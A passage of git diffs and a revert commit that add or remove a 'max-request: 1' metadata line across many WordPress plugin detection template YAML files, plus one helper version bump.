   reference:
     - https://wordpress.org/plugins/wp-migrate-db/
   metadata:
-    max-request: 1
     plugin_namespace: wp-migrate-db
     wpscan: https://wpscan.com/plugin/wp-migrate-db
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
index ee05e3add8..01fb12d0ad 100644
--- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
+++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-multibyte-patch/
   metadata:
-    max-request: 1
     plugin_namespace: wp-multibyte-patch
     wpscan: https://wpscan.com/plugin/wp-multibyte-patch
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml
index df2487955f..1773857e15 100644
--- a/http/technologies/wordpress/plugins/wp-optimize.yaml
+++ b/http/technologies/wordpress/plugins/wp-optimize.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-optimize/
   metadata:
-    max-request: 1
     plugin_namespace: wp-optimize
     wpscan: https://wpscan.com/plugin/wp-optimize
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml
index 79ff01211c..bcd1509c68 100644
--- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml
+++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-pagenavi/
   metadata:
-    max-request: 1
     plugin_namespace: wp-pagenavi
     wpscan: https://wpscan.com/plugin/wp-pagenavi
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml
index 23414b3d1d..c6aca20a60 100644
--- a/http/technologies/wordpress/plugins/wp-reset.yaml
+++ b/http/technologies/wordpress/plugins/wp-reset.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-reset/
   metadata:
-    max-request: 1
     plugin_namespace: wp-reset
     wpscan: https://wpscan.com/plugin/wp-reset
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
index fba45020e4..56dfdf4a59 100644
--- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
+++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-reviews-plugin-for-google/
   metadata:
-    max-request: 1
     plugin_namespace: wp-reviews-plugin-for-google
     wpscan: https://wpscan.com/plugin/wp-reviews-plugin-for-google
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml
index 0178c8e9fb..810fc82cde 100644
--- a/http/technologies/wordpress/plugins/wp-rollback.yaml
+++ b/http/technologies/wordpress/plugins/wp-rollback.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-rollback/
   metadata:
-    max-request: 1
     plugin_namespace: wp-rollback
     wpscan: https://wpscan.com/plugin/wp-rollback
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml
index 017cf76f11..2276545093 100644
--- a/http/technologies/wordpress/plugins/wp-seopress.yaml
+++ b/http/technologies/wordpress/plugins/wp-seopress.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-seopress/
   metadata:
-    max-request: 1
     plugin_namespace: wp-seopress
     wpscan: https://wpscan.com/plugin/wp-seopress
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
index a04ddc6003..783d381ed8 100644
--- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
+++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-sitemap-page/
   metadata:
-    max-request: 1
     plugin_namespace: wp-sitemap-page
     wpscan: https://wpscan.com/plugin/wp-sitemap-page
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml
index bc83478f06..27f6d46c2b 100644
--- a/http/technologies/wordpress/plugins/wp-smushit.yaml
+++ b/http/technologies/wordpress/plugins/wp-smushit.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-smushit/
   metadata:
-    max-request: 1
     plugin_namespace: wp-smushit
     wpscan: https://wpscan.com/plugin/wp-smushit
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml
index dedd2e23b6..ab61cc0338 100644
--- a/http/technologies/wordpress/plugins/wp-statistics.yaml
+++ b/http/technologies/wordpress/plugins/wp-statistics.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-statistics/
   metadata:
-    max-request: 1
     plugin_namespace: wp-statistics
     wpscan: https://wpscan.com/plugin/wp-statistics
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml
index 03cd7137a8..5f6fbc1f75 100644
--- a/http/technologies/wordpress/plugins/wp-super-cache.yaml
+++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-super-cache/
   metadata:
-    max-request: 1
     plugin_namespace: wp-super-cache
     wpscan: https://wpscan.com/plugin/wp-super-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml
index a68d4b7d78..d67150d038 100644
--- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml
+++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-user-avatar/
   metadata:
-    max-request: 1
     plugin_namespace: wp-user-avatar
     wpscan: https://wpscan.com/plugin/wp-user-avatar
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
index bf9dfc3ad8..beeba7ca69 100644
--- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
+++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wpcf7-recaptcha/
   metadata:
-    max-request: 1
     plugin_namespace: wpcf7-recaptcha
     wpscan: https://wpscan.com/plugin/wpcf7-recaptcha
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
index 47911a86a5..c225df7bfd 100644
--- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
+++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wpcf7-redirect/
   metadata:
-    max-request: 1
     plugin_namespace: wpcf7-redirect
     wpscan: https://wpscan.com/plugin/wpcf7-redirect
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml
index 1c25b6f488..aaad04cb76 100644
--- a/http/technologies/wordpress/plugins/wpforms-lite.yaml
+++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wpforms-lite/
   metadata:
-    max-request: 1
     plugin_namespace: wpforms-lite
     wpscan: https://wpscan.com/plugin/wpforms-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml
index b36317acd8..ff750a7d2a 100644
--- a/http/technologies/wordpress/plugins/wps-hide-login.yaml
+++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wps-hide-login/
   metadata:
-    max-request: 1
     plugin_namespace: wps-hide-login
     wpscan: https://wpscan.com/plugin/wps-hide-login
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
index 5eb35dd17e..f1e7595ccd 100644
--- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
+++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wpvivid-backuprestore/
   metadata:
-    max-request: 1
     plugin_namespace: wpvivid-backuprestore
     wpscan: https://wpscan.com/plugin/wpvivid-backuprestore
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
index ceb2b8d600..4b2769ee46 100644
--- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
+++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/yith-woocommerce-wishlist/
   metadata:
-    max-request: 1
     plugin_namespace: yith-woocommerce-wishlist
     wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist
   tags: tech,wordpress,wp-plugin,top-100,top-200

From 392adf23006af9105c947a83ae4713e021789325 Mon Sep 17 00:00:00 2001
From: Prince Chaddha 
Date: Sun, 1 Oct 2023 13:50:49 +0530
Subject: [PATCH 0627/1090] Revert "Auto WordPress Plugins Update [Sun Oct  1
 04:12:23 UTC 2023] :robot:"

This reverts commit ceb38c80b011136c9fc51b84ea2f6db1e94060be.
---
 helpers/wordpress/plugins/child-theme-configurator.txt          | 2 +-
 http/technologies/wordpress/plugins/ad-inserter.yaml            | 1 +
 http/technologies/wordpress/plugins/add-to-any.yaml             | 1 +
 http/technologies/wordpress/plugins/admin-menu-editor.yaml      | 1 +
 http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 +
 http/technologies/wordpress/plugins/akismet.yaml                | 1 +
 .../wordpress/plugins/all-404-redirect-to-homepage.yaml         | 1 +
 http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml    | 1 +
 .../technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 +
 .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml  | 1 +
 http/technologies/wordpress/plugins/amp.yaml                    | 1 +
 http/technologies/wordpress/plugins/antispam-bee.yaml           | 1 +
 http/technologies/wordpress/plugins/astra-sites.yaml            | 1 +
 http/technologies/wordpress/plugins/astra-widgets.yaml          | 1 +
 http/technologies/wordpress/plugins/autoptimize.yaml            | 1 +
 http/technologies/wordpress/plugins/backwpup.yaml               | 1 +
 http/technologies/wordpress/plugins/better-search-replace.yaml  | 1 +
 http/technologies/wordpress/plugins/better-wp-security.yaml     | 1 +
 .../wordpress/plugins/black-studio-tinymce-widget.yaml          | 1 +
 http/technologies/wordpress/plugins/breadcrumb-navxt.yaml       | 1 +
 http/technologies/wordpress/plugins/breeze.yaml                 | 1 +
 http/technologies/wordpress/plugins/broken-link-checker.yaml    | 1 +
 .../wordpress/plugins/child-theme-configurator.yaml             | 1 +
 http/technologies/wordpress/plugins/classic-editor.yaml         | 1 +
 http/technologies/wordpress/plugins/classic-widgets.yaml        | 1 +
 .../wordpress/plugins/click-to-chat-for-whatsapp.yaml           | 1 +
 http/technologies/wordpress/plugins/cmb2.yaml                   | 1 +
 http/technologies/wordpress/plugins/coblocks.yaml               | 1 +
 http/technologies/wordpress/plugins/code-snippets.yaml          | 1 +
 http/technologies/wordpress/plugins/coming-soon.yaml            | 1 +
 http/technologies/wordpress/plugins/complianz-gdpr.yaml         | 1 +
 .../technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 +
 http/technologies/wordpress/plugins/contact-form-7.yaml         | 1 +
 http/technologies/wordpress/plugins/contact-form-cfdb7.yaml     | 1 +
 http/technologies/wordpress/plugins/cookie-law-info.yaml        | 1 +
 http/technologies/wordpress/plugins/cookie-notice.yaml          | 1 +
 http/technologies/wordpress/plugins/creame-whatsapp-me.yaml     | 1 +
 .../wordpress/plugins/creative-mail-by-constant-contact.yaml    | 1 +
 http/technologies/wordpress/plugins/custom-css-js.yaml          | 1 +
 http/technologies/wordpress/plugins/custom-fonts.yaml           | 1 +
 http/technologies/wordpress/plugins/custom-post-type-ui.yaml    | 1 +
 http/technologies/wordpress/plugins/disable-comments.yaml       | 1 +
 http/technologies/wordpress/plugins/disable-gutenberg.yaml      | 1 +
 http/technologies/wordpress/plugins/duplicate-page.yaml         | 1 +
 http/technologies/wordpress/plugins/duplicate-post.yaml         | 1 +
 http/technologies/wordpress/plugins/duplicator.yaml             | 1 +
 .../wordpress/plugins/duracelltomi-google-tag-manager.yaml      | 1 +
 http/technologies/wordpress/plugins/easy-fancybox.yaml          | 1 +
 http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 +
 http/technologies/wordpress/plugins/easy-wp-smtp.yaml           | 1 +
 http/technologies/wordpress/plugins/elementor.yaml              | 1 +
 http/technologies/wordpress/plugins/elementskit-lite.yaml       | 1 +
 http/technologies/wordpress/plugins/enable-media-replace.yaml   | 1 +
 http/technologies/wordpress/plugins/envato-elements.yaml        | 1 +
 .../wordpress/plugins/essential-addons-for-elementor-lite.yaml  | 1 +
 http/technologies/wordpress/plugins/ewww-image-optimizer.yaml   | 1 +
 .../wordpress/plugins/facebook-for-woocommerce.yaml             | 1 +
 http/technologies/wordpress/plugins/fast-indexing-api.yaml      | 1 +
 .../wordpress/plugins/favicon-by-realfavicongenerator.yaml      | 1 +
 http/technologies/wordpress/plugins/flamingo.yaml               | 1 +
 http/technologies/wordpress/plugins/fluentform.yaml             | 1 +
 http/technologies/wordpress/plugins/font-awesome.yaml           | 1 +
 .../wordpress/plugins/force-regenerate-thumbnails.yaml          | 1 +
 http/technologies/wordpress/plugins/formidable.yaml             | 1 +
 http/technologies/wordpress/plugins/forminator.yaml             | 1 +
 http/technologies/wordpress/plugins/ga-google-analytics.yaml    | 1 +
 http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 +
 .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml    | 1 +
 .../wordpress/plugins/google-analytics-for-wordpress.yaml       | 1 +
 .../technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 +
 http/technologies/wordpress/plugins/google-site-kit.yaml        | 1 +
 .../wordpress/plugins/google-sitemap-generator.yaml             | 1 +
 http/technologies/wordpress/plugins/gtranslate.yaml             | 1 +
 http/technologies/wordpress/plugins/gutenberg.yaml              | 1 +
 http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 +
 .../wordpress/plugins/header-footer-code-manager.yaml           | 1 +
 .../technologies/wordpress/plugins/header-footer-elementor.yaml | 1 +
 http/technologies/wordpress/plugins/header-footer.yaml          | 1 +
 http/technologies/wordpress/plugins/health-check.yaml           | 1 +
 http/technologies/wordpress/plugins/hello-dolly.yaml            | 1 +
 http/technologies/wordpress/plugins/host-webfonts-local.yaml    | 1 +
 http/technologies/wordpress/plugins/imagify.yaml                | 1 +
 http/technologies/wordpress/plugins/imsanity.yaml               | 1 +
 .../wordpress/plugins/insert-headers-and-footers.yaml           | 1 +
 http/technologies/wordpress/plugins/instagram-feed.yaml         | 1 +
 .../wordpress/plugins/intuitive-custom-post-order.yaml          | 1 +
 http/technologies/wordpress/plugins/iwp-client.yaml             | 1 +
 http/technologies/wordpress/plugins/jetpack-boost.yaml          | 1 +
 http/technologies/wordpress/plugins/jetpack.yaml                | 1 +
 http/technologies/wordpress/plugins/kadence-blocks.yaml         | 1 +
 http/technologies/wordpress/plugins/kirki.yaml                  | 1 +
 http/technologies/wordpress/plugins/leadin.yaml                 | 1 +
 .../wordpress/plugins/limit-login-attempts-reloaded.yaml        | 1 +
 http/technologies/wordpress/plugins/limit-login-attempts.yaml   | 1 +
 http/technologies/wordpress/plugins/litespeed-cache.yaml        | 1 +
 http/technologies/wordpress/plugins/loco-translate.yaml         | 1 +
 http/technologies/wordpress/plugins/loginizer.yaml              | 1 +
 .../wordpress/plugins/mailchimp-for-woocommerce.yaml            | 1 +
 http/technologies/wordpress/plugins/mailchimp-for-wp.yaml       | 1 +
 http/technologies/wordpress/plugins/mailpoet.yaml               | 1 +
 http/technologies/wordpress/plugins/maintenance.yaml            | 1 +
 http/technologies/wordpress/plugins/mainwp-child.yaml           | 1 +
 http/technologies/wordpress/plugins/malcare-security.yaml       | 1 +
 http/technologies/wordpress/plugins/megamenu.yaml               | 1 +
 http/technologies/wordpress/plugins/members.yaml                | 1 +
 http/technologies/wordpress/plugins/meta-box.yaml               | 1 +
 http/technologies/wordpress/plugins/ml-slider.yaml              | 1 +
 http/technologies/wordpress/plugins/newsletter.yaml             | 1 +
 .../wordpress/plugins/nextend-facebook-connect.yaml             | 1 +
 http/technologies/wordpress/plugins/nextgen-gallery.yaml        | 1 +
 http/technologies/wordpress/plugins/ninja-forms.yaml            | 1 +
 http/technologies/wordpress/plugins/ocean-extra.yaml            | 1 +
 .../technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 +
 http/technologies/wordpress/plugins/one-click-demo-import.yaml  | 1 +
 http/technologies/wordpress/plugins/optinmonster.yaml           | 1 +
 http/technologies/wordpress/plugins/otter-blocks.yaml           | 1 +
 http/technologies/wordpress/plugins/password-protected.yaml     | 1 +
 http/technologies/wordpress/plugins/pdf-embedder.yaml           | 1 +
 .../wordpress/plugins/pinterest-for-woocommerce.yaml            | 1 +
 http/technologies/wordpress/plugins/pixelyoursite.yaml          | 1 +
 http/technologies/wordpress/plugins/polylang.yaml               | 1 +
 http/technologies/wordpress/plugins/popup-builder.yaml          | 1 +
 http/technologies/wordpress/plugins/popup-maker.yaml            | 1 +
 http/technologies/wordpress/plugins/post-smtp.yaml              | 1 +
 http/technologies/wordpress/plugins/post-types-order.yaml       | 1 +
 .../wordpress/plugins/premium-addons-for-elementor.yaml         | 1 +
 http/technologies/wordpress/plugins/pretty-link.yaml            | 1 +
 http/technologies/wordpress/plugins/really-simple-captcha.yaml  | 1 +
 http/technologies/wordpress/plugins/really-simple-ssl.yaml      | 1 +
 http/technologies/wordpress/plugins/redirection.yaml            | 1 +
 http/technologies/wordpress/plugins/redux-framework.yaml        | 1 +
 http/technologies/wordpress/plugins/regenerate-thumbnails.yaml  | 1 +
 http/technologies/wordpress/plugins/safe-svg.yaml               | 1 +
 http/technologies/wordpress/plugins/seo-by-rank-math.yaml       | 1 +
 http/technologies/wordpress/plugins/sg-cachepress.yaml          | 1 +
 http/technologies/wordpress/plugins/sg-security.yaml            | 1 +
 http/technologies/wordpress/plugins/shortcodes-ultimate.yaml    | 1 +
 .../wordpress/plugins/shortpixel-image-optimiser.yaml           | 1 +
 .../wordpress/plugins/simple-custom-post-order.yaml             | 1 +
 http/technologies/wordpress/plugins/siteguard.yaml              | 1 +
 http/technologies/wordpress/plugins/siteorigin-panels.yaml      | 1 +
 http/technologies/wordpress/plugins/smart-slider-3.yaml         | 1 +
 http/technologies/wordpress/plugins/so-widgets-bundle.yaml      | 1 +
 .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml  | 1 +
 http/technologies/wordpress/plugins/sucuri-scanner.yaml         | 1 +
 http/technologies/wordpress/plugins/svg-support.yaml            | 1 +
 http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 +
 http/technologies/wordpress/plugins/tablepress.yaml             | 1 +
 http/technologies/wordpress/plugins/taxonomy-terms-order.yaml   | 1 +
 http/technologies/wordpress/plugins/the-events-calendar.yaml    | 1 +
 http/technologies/wordpress/plugins/themeisle-companion.yaml    | 1 +
 http/technologies/wordpress/plugins/tinymce-advanced.yaml       | 1 +
 .../wordpress/plugins/translatepress-multilingual.yaml          | 1 +
 .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml        | 1 +
 .../technologies/wordpress/plugins/under-construction-page.yaml | 1 +
 http/technologies/wordpress/plugins/updraftplus.yaml            | 1 +
 http/technologies/wordpress/plugins/use-any-font.yaml           | 1 +
 http/technologies/wordpress/plugins/user-role-editor.yaml       | 1 +
 .../wordpress/plugins/velvet-blues-update-urls.yaml             | 1 +
 http/technologies/wordpress/plugins/w3-total-cache.yaml         | 1 +
 .../wordpress/plugins/webp-converter-for-media.yaml             | 1 +
 http/technologies/wordpress/plugins/webp-express.yaml           | 1 +
 .../wordpress/plugins/widget-importer-exporter.yaml             | 1 +
 .../wordpress/plugins/woo-cart-abandonment-recovery.yaml        | 1 +
 .../wordpress/plugins/woo-checkout-field-editor-pro.yaml        | 1 +
 http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 +
 .../plugins/woocommerce-gateway-paypal-express-checkout.yaml    | 1 +
 .../wordpress/plugins/woocommerce-gateway-stripe.yaml           | 1 +
 http/technologies/wordpress/plugins/woocommerce-payments.yaml   | 1 +
 .../wordpress/plugins/woocommerce-paypal-payments.yaml          | 1 +
 .../plugins/woocommerce-pdf-invoices-packing-slips.yaml         | 1 +
 http/technologies/wordpress/plugins/woocommerce-services.yaml   | 1 +
 http/technologies/wordpress/plugins/woocommerce.yaml            | 1 +
 http/technologies/wordpress/plugins/wordfence.yaml              | 1 +
 http/technologies/wordpress/plugins/wordpress-importer.yaml     | 1 +
 http/technologies/wordpress/plugins/wordpress-seo.yaml          | 1 +
 http/technologies/wordpress/plugins/worker.yaml                 | 1 +
 http/technologies/wordpress/plugins/wp-fastest-cache.yaml       | 1 +
 http/technologies/wordpress/plugins/wp-file-manager.yaml        | 1 +
 http/technologies/wordpress/plugins/wp-google-maps.yaml         | 1 +
 http/technologies/wordpress/plugins/wp-mail-smtp.yaml           | 1 +
 http/technologies/wordpress/plugins/wp-maintenance-mode.yaml    | 1 +
 http/technologies/wordpress/plugins/wp-migrate-db.yaml          | 1 +
 http/technologies/wordpress/plugins/wp-multibyte-patch.yaml     | 1 +
 http/technologies/wordpress/plugins/wp-optimize.yaml            | 1 +
 http/technologies/wordpress/plugins/wp-pagenavi.yaml            | 1 +
 http/technologies/wordpress/plugins/wp-reset.yaml               | 1 +
 .../wordpress/plugins/wp-reviews-plugin-for-google.yaml         | 1 +
 http/technologies/wordpress/plugins/wp-rollback.yaml            | 1 +
 http/technologies/wordpress/plugins/wp-seopress.yaml            | 1 +
 http/technologies/wordpress/plugins/wp-sitemap-page.yaml        | 1 +
 http/technologies/wordpress/plugins/wp-smushit.yaml             | 1 +
 http/technologies/wordpress/plugins/wp-statistics.yaml          | 1 +
 http/technologies/wordpress/plugins/wp-super-cache.yaml         | 1 +
 http/technologies/wordpress/plugins/wp-user-avatar.yaml         | 1 +
 http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml        | 1 +
 http/technologies/wordpress/plugins/wpcf7-redirect.yaml         | 1 +
 http/technologies/wordpress/plugins/wpforms-lite.yaml           | 1 +
 http/technologies/wordpress/plugins/wps-hide-login.yaml         | 1 +
 http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml  | 1 +
 .../wordpress/plugins/yith-woocommerce-wishlist.yaml            | 1 +
 201 files changed, 201 insertions(+), 1 deletion(-)

diff --git a/helpers/wordpress/plugins/child-theme-configurator.txt b/helpers/wordpress/plugins/child-theme-configurator.txt
index bd4053bfb1..d5724cd41b 100644
--- a/helpers/wordpress/plugins/child-theme-configurator.txt
+++ b/helpers/wordpress/plugins/child-theme-configurator.txt
@@ -1 +1 @@
-2.6.3
\ No newline at end of file
+2.6.2
\ No newline at end of file
diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml
index 7cbd1855ae..ebb5ba1042 100644
--- a/http/technologies/wordpress/plugins/ad-inserter.yaml
+++ b/http/technologies/wordpress/plugins/ad-inserter.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ad-inserter/
   metadata:
+    max-request: 1
     plugin_namespace: ad-inserter
     wpscan: https://wpscan.com/plugin/ad-inserter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml
index 8d579ff23d..fddfbf3118 100644
--- a/http/technologies/wordpress/plugins/add-to-any.yaml
+++ b/http/technologies/wordpress/plugins/add-to-any.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/add-to-any/
   metadata:
+    max-request: 1
     plugin_namespace: add-to-any
     wpscan: https://wpscan.com/plugin/add-to-any
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml
index 4a6d8b7bbe..7a6e8a76ec 100644
--- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml
+++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/admin-menu-editor/
   metadata:
+    max-request: 1
     plugin_namespace: admin-menu-editor
     wpscan: https://wpscan.com/plugin/admin-menu-editor
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
index e4eb308d39..940c0e614c 100644
--- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
+++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/advanced-custom-fields/
   metadata:
+    max-request: 1
     plugin_namespace: advanced-custom-fields
     wpscan: https://wpscan.com/plugin/advanced-custom-fields
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml
index f68ad2a6bf..ac77f4e5f5 100644
--- a/http/technologies/wordpress/plugins/akismet.yaml
+++ b/http/technologies/wordpress/plugins/akismet.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/akismet/
   metadata:
+    max-request: 1
     plugin_namespace: akismet
     wpscan: https://wpscan.com/plugin/akismet
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
index 10f104f2c7..90aa5881fd 100644
--- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
+++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/all-404-redirect-to-homepage/
   metadata:
+    max-request: 1
     plugin_namespace: all-404-redirect-to-homepage
     wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
index 8addc28ded..1bf337da6c 100644
--- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-seo-pack/
   metadata:
+    max-request: 1
     plugin_namespace: all-in-one-seo-pack
     wpscan: https://wpscan.com/plugin/all-in-one-seo-pack
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
index 2e579621ac..7cec152555 100644
--- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-wp-migration/
   metadata:
+    max-request: 1
     plugin_namespace: all-in-one-wp-migration
     wpscan: https://wpscan.com/plugin/all-in-one-wp-migration
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
index 41e297ffeb..8a4b6133cd 100644
--- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/
   metadata:
+    max-request: 1
     plugin_namespace: all-in-one-wp-security-and-firewall
